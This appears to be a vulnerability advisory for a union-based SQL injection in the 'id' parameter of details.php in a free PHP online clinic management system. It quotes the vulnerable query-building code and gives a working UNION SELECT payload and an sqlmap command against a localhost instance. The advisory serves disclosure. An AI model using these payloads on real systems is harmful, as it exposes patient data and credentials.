| Details | |
|---|---|
| Vulnerability Type | Union Based SQL Injection |
| Affected File | details.php |
| Parameter | id |
| Vendor | https://itsourcecode.com/ |
| Product | Online Clinic Management System v1 |
| Softlink | https://itsourcecode.com/free-projects/php-project/online-clinic-management-system-php-projects-source-code/ |
The Online Clinic Management System is vulnerable to Union based SQL Injection in the details.php script. This flaw enables attackers to manipulate SQL queries and exfiltrate sensitive data (e.g., administrative credentials), which can lead to complete system compromise.
$query = "SELECT p.patient_id,p.fname,p.lname,p.patient_type,p.age,p.address FROM check_up c,patients p where c.patient_id=p.patient_id and c.check_id='".$id."'";
$result = mysqli_query($db, $query) or die (mysqli_error($db));
while ($row = mysqli_fetch_assoc($result)) {
echo '<tr>';
echo '<td>'. $row['patient_id'].'</td>';
echo '<td>'. $row['fname'].'</td>';
echo '<td>'. $row['lname'].'</td>';
echo '<td>'. $row['patient_type'].'</td>';
echo '<td>'. $row['age'].'</td>';
echo '<td>'. $row['address'].'</td>';
echo '</tr> ';
}
1. <http://localhost:8083/details.php?action=post> & id=1005' and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,database() -- -
2. sqlmap -u "<http://localhost:8083/details.php?action=post> & id=1005" --cookie="PHPSESSID=7d9f99c60c0296d8878b65b4aada0759" --level=5 --risk=3 --batch --dbs